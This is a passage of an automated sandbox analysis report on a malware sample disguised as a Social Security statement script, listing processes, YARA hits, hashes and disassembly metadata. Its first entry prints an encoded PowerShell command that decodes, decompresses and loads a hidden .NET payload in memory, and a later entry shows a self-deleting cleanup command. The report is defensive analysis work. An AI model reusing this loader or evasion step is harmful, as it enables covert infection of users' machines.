                                                Commandline:"C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe" -enc JABWAGkAaAB3AHgAaQBrAHQAZwBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAEgAZwB3AHIAYgBjAGkAegBoAGsAIAA9ACAAZwBlAHQALQBjAG8AbgB0AGUAbgB0ACAAJABWAGkAaAB3AHgAaQBrAHQAZwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAZwB3AHIAYgBjAGkAegBoAGsALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEMAbwB4AG0AYgB4AG4AZgB0AGgAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAKQA7ACQATwB2AGoAbQBhACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABIAHgAYgB6AGgAbQB5AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBvAHAAeQBUAG8AKAAgACQATwB2AGoAbQBhACAAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBsAG8AcwBlACgAKQA7ACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgACQATwB2AGoAbQBhAC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAEwAdABnAHQAegB6AHEAYwB1AHYAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAFUAaABmAGwAdgAgAD0AIAAkAEwAdABnAHQAegB6AHEAYwB1AHYALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABVAGgAZgBsAHYALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFUAaABmAGwAdgAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
                                                Imagebase:0x7ff6c0e30000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2145984908.0000024F6F580000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2060632755.0000024F57431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 0%, ReversingLabs
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:10:36:03
                                                Start date:16/09/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff70f010000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:10:37:00
                                                Start date:16/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0x245aad30000
                                                File size:41'552 bytes
                                                MD5 hash:909A1D386235DD5F6BA61B91BA34119D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:10
                                                Start time:10:37:00
                                                Start date:16/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0x27fa98c0000
                                                File size:41'552 bytes
                                                MD5 hash:909A1D386235DD5F6BA61B91BA34119D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:11
                                                Start time:10:37:00
                                                Start date:16/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0x153d5490000
                                                File size:41'552 bytes
                                                MD5 hash:909A1D386235DD5F6BA61B91BA34119D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:12
                                                Start time:10:37:00
                                                Start date:16/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0x22fb5200000
                                                File size:41'552 bytes
                                                MD5 hash:909A1D386235DD5F6BA61B91BA34119D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:13
                                                Start time:10:37:00
                                                Start date:16/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0x2017f660000
                                                File size:41'552 bytes
                                                MD5 hash:909A1D386235DD5F6BA61B91BA34119D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:14
                                                Start time:10:37:00
                                                Start date:16/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0x20109140000
                                                File size:41'552 bytes
                                                MD5 hash:909A1D386235DD5F6BA61B91BA34119D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:15
                                                Start time:10:37:00
                                                Start date:16/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0x22b53590000
                                                File size:41'552 bytes
                                                MD5 hash:909A1D386235DD5F6BA61B91BA34119D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:16
                                                Start time:10:37:00
                                                Start date:16/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0x1adb00b0000
                                                File size:41'552 bytes
                                                MD5 hash:909A1D386235DD5F6BA61B91BA34119D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                General

                                                Target ID:17
                                                Start time:10:37:00
                                                Start date:16/09/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\user\Desktop\Social_Security_Statement_Review.vbs' -Force
                                                Imagebase:0x7ff760310000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:18
                                                Start time:10:37:00
                                                Start date:16/09/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff70f010000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Executed Functions

                                                  Function 00007FF887F221A0 Relevance: 17.8, Strings: 13, Instructions: 1560COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8!g$(8!g$08!g$88!g$88!g$@8!g$P8!g$X8!g$`8!g$h8!g$p8!g$x8!g$wOg
                                                  • API String ID: 0-395191637
                                                  • Opcode ID: fe59187093d08dfe780a7fffda72edccad21257227253f743908b8d403fbc7ef
                                                  • Instruction ID: fdcca778f04b9baa2e6886935c34c353d588a86f0fa78d5c480f27bf863711a4
                                                  • Opcode Fuzzy Hash: fe59187093d08dfe780a7fffda72edccad21257227253f743908b8d403fbc7ef
                                                  • Instruction Fuzzy Hash: 78B2E470A18A498FDB95DB6CD494BA97BF2FF59340F5501A9D48DCB292CE35EC82CB00
                                                  Function 00007FF887F26831 Relevance: 5.8, Strings: 4, Instructions: 775COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: }$9!g$9!g$wOg
                                                  • API String ID: 0-4027812719
                                                  • Opcode ID: 3a7cac1b6d8a7d9f108a86f2ac258b049ca9704e53b4a27691e5119765722798
                                                  • Instruction ID: e38f898c4d28211eb355e89fb81da0e112850e17baf26469583aa943eb01dd84
                                                  • Opcode Fuzzy Hash: 3a7cac1b6d8a7d9f108a86f2ac258b049ca9704e53b4a27691e5119765722798
                                                  • Instruction Fuzzy Hash: AB32C3306689498FDB98EB2CD455BB977E1FF5A351F0400B9E44ECB2A2DE28EC42C741
                                                  Function 00007FF887F29B79 Relevance: 3.4, Strings: 2, Instructions: 918COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: wOg$wOg
                                                  • API String ID: 0-2408449732
                                                  • Opcode ID: a217f7322f132b1f7722e98446fc4049431522cccd30090daed7be962afa913f
                                                  • Instruction ID: 807a8a62f2e3da36c256e9d7db4fb78a3c725e1d2fe3980f9d365bcb54a5b101
                                                  • Opcode Fuzzy Hash: a217f7322f132b1f7722e98446fc4049431522cccd30090daed7be962afa913f
                                                  • Instruction Fuzzy Hash: D4520330A6CF4A8FEB98DB29A455679B3E1FF68350F54057DC44EC7292DE28B842C781
                                                  Function 00007FF887F372FD Relevance: 1.3, Instructions: 1302COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 818e9806da90ea91bb770ef834c0b63abe72555093d9b7eeeec997a9f1567d6d
                                                  • Instruction ID: 46569236f75f41ac821f2ae08a1e5e6a91a984f9d8fffe857722d52d988b4262
                                                  • Opcode Fuzzy Hash: 818e9806da90ea91bb770ef834c0b63abe72555093d9b7eeeec997a9f1567d6d
                                                  • Instruction Fuzzy Hash: 8E820630A58A4B4FE7699B2984952BD73F2FF98354F18067ED04AC72C6DE3CA842C751
                                                  Function 00007FF887F2C570 Relevance: 6.7, Strings: 5, Instructions: 466COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P:!g$P:!g$P:!g$`:!g$+[
                                                  • API String ID: 0-3533462054
                                                  • Opcode ID: 550e81b54b17ec4bdc97d1fe722cf35ae403232ee55ffdb87531916ba1b7e2f7
                                                  • Instruction ID: 24eebfe3d3f07eb766a942b48d6d39cbbbe55fac6a0cb2a5a154b6ce28bb484d
                                                  • Opcode Fuzzy Hash: 550e81b54b17ec4bdc97d1fe722cf35ae403232ee55ffdb87531916ba1b7e2f7
                                                  • Instruction Fuzzy Hash: 09E1A131A6894D8FDB89EF2CD895AA97BF1FF58340F5404A9E40DC7296DA25EC42C780
                                                  Function 00007FF887F35400 Relevance: 6.6, Strings: 5, Instructions: 341COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (LXg$0LXg$0LXg$0LXg$8LXg
                                                  • API String ID: 0-4064924004
                                                  • Opcode ID: 5fcb3264f82570e1e248612687f9cc888e125bf1943e16b010c4e12279651d65
                                                  • Instruction ID: 6ffe753c7ad372d64e5a1c89a0f7616910f7c1c2ce738d73f555af34ac028d25
                                                  • Opcode Fuzzy Hash: 5fcb3264f82570e1e248612687f9cc888e125bf1943e16b010c4e12279651d65
                                                  • Instruction Fuzzy Hash: 21A1BF30B5C9598FEB89EB6994556BDB7F2FF89300F5400B9D04EC7292CE28AC42C780
                                                  Function 00007FF887F2C5B1 Relevance: 5.6, Strings: 4, Instructions: 621COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P:!g$P:!g$`:!g$+[
                                                  • API String ID: 0-1721256494
                                                  • Opcode ID: aaf224e564ae252f2ed0efa18041fe4841950ecd57bee844e7eca717badcf86f
                                                  • Instruction ID: ea7fe09e9753c1ac927bb344f0f018f890660d13acd46e47308cdd83fa132843
                                                  • Opcode Fuzzy Hash: aaf224e564ae252f2ed0efa18041fe4841950ecd57bee844e7eca717badcf86f
                                                  • Instruction Fuzzy Hash: D8226070A6894D8FDB98EF29D495AAD7BF1FF58340F5404A8E40DC7296DA34EC42CB80
                                                  Function 00007FF887F22F6D Relevance: 4.5, Strings: 3, Instructions: 792COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8!g$8!g$wOg
                                                  • API String ID: 0-3850002637
                                                  • Opcode ID: afcbe137f31322559ef136771185c74c1fea01b360efa85b18d44d779135c08b
                                                  • Instruction ID: 5c02302f803ebee9e8b626d6fcf3999d6ca38651ebf62c48afc7677a780252a8
                                                  • Opcode Fuzzy Hash: afcbe137f31322559ef136771185c74c1fea01b360efa85b18d44d779135c08b
                                                  • Instruction Fuzzy Hash: 2052AE70A28A4A8FDB94DF29D4957A9BBF1FF59344F1401BED44DD7292CA34E882CB01
                                                  Function 00007FF887F2F1FA Relevance: 3.9, Strings: 3, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: p:!g$pKXg$xKXg
                                                  • API String ID: 0-2081502048
                                                  • Opcode ID: e2d35259170bb0c993dd12c6afa13f9633ee19c26b699c143a214127998b48e1
                                                  • Instruction ID: 17b540cc95a867efd7540a08a1b9522d0d65b7d8a2b776e9b9876713353c1652
                                                  • Opcode Fuzzy Hash: e2d35259170bb0c993dd12c6afa13f9633ee19c26b699c143a214127998b48e1
                                                  • Instruction Fuzzy Hash: 9D51F22055DBC54FD75297B898656A97FF1EF5B220B0904EAC48ACB1A7D92CAC0AC312
                                                  Function 00007FF887BDE419 Relevance: 3.9, Strings: 3, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2166058542.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887bd0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XjOg$XjOg$XjOg
                                                  • API String ID: 0-2021079717
                                                  • Opcode ID: a6554d89864905f759784d2a1e29f7f847c2e756a710aa82bdedaa06e66300fb
                                                  • Instruction ID: 5d995df572f295877f8b28fa3b19b3068f35b896f7b739fdc80d0e61aea3b81a
                                                  • Opcode Fuzzy Hash: a6554d89864905f759784d2a1e29f7f847c2e756a710aa82bdedaa06e66300fb
                                                  • Instruction Fuzzy Hash: 3741C230A4D9959FDB55DB6884A57AC7BF2FF4A340F4804BDD44ACB1A3C9685C41C781
                                                  Function 00007FF887BDE450 Relevance: 3.8, Strings: 3, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2166058542.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887bd0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XjOg$XjOg$XjOg
                                                  • API String ID: 0-2021079717
                                                  • Opcode ID: 74757fc369bcb53b5a01bba2852ef669991bbc20ed6770a26bbac7936bf64545
                                                  • Instruction ID: befd8095eb7c8deeb15cfecad679eee753526fce53ee512e69b594acb2c97b4e
                                                  • Opcode Fuzzy Hash: 74757fc369bcb53b5a01bba2852ef669991bbc20ed6770a26bbac7936bf64545
                                                  • Instruction Fuzzy Hash: 95319F30A4E9955FD755CBB844A9BAC7FF2FF4A340B4804FED449DB193DA285806C781
                                                  Function 00007FF887F2CF40 Relevance: 3.0, Strings: 2, Instructions: 535COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (!!g$0'!g
                                                  • API String ID: 0-820419343
                                                  • Opcode ID: e2f607a07003dbd5eb18fc346eef7a6b0da86e3fbac5ff1a4aa67cf933aa21da
                                                  • Instruction ID: a2e98bc55499453fa4a11a9517097e96675d59d8f368579bc516616513c75c54
                                                  • Opcode Fuzzy Hash: e2f607a07003dbd5eb18fc346eef7a6b0da86e3fbac5ff1a4aa67cf933aa21da
                                                  • Instruction Fuzzy Hash: 3402F4718AD6C64FE366C62568165AC3BF0FF563A0F0405F9D48DCB4E3EA5CA80AC752
                                                  Function 00007FF887F32465 Relevance: 2.9, Strings: 2, Instructions: 399COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: wOg$wOg
                                                  • API String ID: 0-2408449732
                                                  • Opcode ID: 9218d17b68179a0b89a0842663c66b1f089198768cb4b6be73820a824497ac57
                                                  • Instruction ID: 1e400d71586afd942f00311d965af3b01b312b8bbe9474222aa3a7db527d8ee3
                                                  • Opcode Fuzzy Hash: 9218d17b68179a0b89a0842663c66b1f089198768cb4b6be73820a824497ac57
                                                  • Instruction Fuzzy Hash: 55C12731A5CA4A8FEB59EB28D8555BD77F1FF69380F0401BAD44EC7296DE24E842C780
                                                  Function 00007FF887CA229B Relevance: 2.9, Strings: 2, Instructions: 396COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2168520962.00007FF887CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887ca0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: bL$8G
                                                  • API String ID: 0-2500780603
                                                  • Opcode ID: 6b33ed624da98d142b6d408bb5cfeff9e4a1de5856d72340d15824441984c3fd
                                                  • Instruction ID: 9d1112e3eced1315ca4094857eb81a5a22d40e5456257166388903cb99750273
                                                  • Opcode Fuzzy Hash: 6b33ed624da98d142b6d408bb5cfeff9e4a1de5856d72340d15824441984c3fd
                                                  • Instruction Fuzzy Hash: FCC12971D4DA9A4FEB999B688855ABDB7E2FF95351B1801BED40DC30D2DF18AC80C701
                                                  Function 00007FF887F208E8 Relevance: 2.8, Strings: 2, Instructions: 309COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$h:!g
                                                  • API String ID: 0-50101433
                                                  • Opcode ID: ff95f2a92337c1499efbf8ecd139120bf2ea5bcbdbb0afe7799a672e9446a26a
                                                  • Instruction ID: 5cd3e8276cd1eeac4d8b767853c7b82c920b2da9a8573db949e7ea469cd4a887
                                                  • Opcode Fuzzy Hash: ff95f2a92337c1499efbf8ecd139120bf2ea5bcbdbb0afe7799a672e9446a26a
                                                  • Instruction Fuzzy Hash: DC91E631B6C60A4FE2989B1DA45537D77E1FF85360F54027ED88EC72D5DE28A842C782
                                                  Function 00007FF887F38FAB Relevance: 2.7, Strings: 2, Instructions: 235COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2178174445.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887f20000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: x6!g$x6!g
                                                  • API String ID: 0-2005818334
                                                  • Opcode ID: 2a132a9565a5f5b2270087e3d58aced3da72a0c6ae2460f4c1ed8665d9bbefc1
                                                  • Instruction ID: f75bce4946c8257243b61b5ef68dc14853dfffb3f5075ddf53ddcae5ee32a342
                                                  • Opcode Fuzzy Hash: 2a132a9565a5f5b2270087e3d58aced3da72a0c6ae2460f4c1ed8665d9bbefc1
                                                  • Instruction Fuzzy Hash: C1612421A5CA4B4FE755E77D94552B977E2FF983A4F0400BEC04DCB296DE2CA842C381
                                                  Function 00007FF887CA2D4B Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2168520962.00007FF887CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887ca0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: bL$H
                                                  • API String ID: 0-1394303329
                                                  • Opcode ID: 4fac09cc1050b997b6646b16ab7a491ef0fff051c1dfeab57350ffaf554bdc1b
                                                  • Instruction ID: 67e59790a9d377b93d6f24d834182722003b06f91456641c9150c346181fa259
                                                  • Opcode Fuzzy Hash: 4fac09cc1050b997b6646b16ab7a491ef0fff051c1dfeab57350ffaf554bdc1b
                                                  • Instruction Fuzzy Hash: 5F510B62E4DA964FEB959A689555ABDA6F2FFA4352B1800BEC40DC71C3DE1CDC80C341
                                                  Function 00007FF887BE062D Relevance: 2.7, Strings: 2, Instructions: 160COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2166058542.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff887bd0000_Social_Security_Statement_Review.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P7!g$X7!g
                                                  • API String ID: 0-603832050
                                                  • Opcode ID: f413b816745be071e1d7968b2b15e6d2c9d006fdff61fe45f0fe451a6e3487d2
                                                  • Instruction ID: 0fcb75e02202b45aa1d3a1223c9cea578ad7f2937c433676430b8ae5780d4950
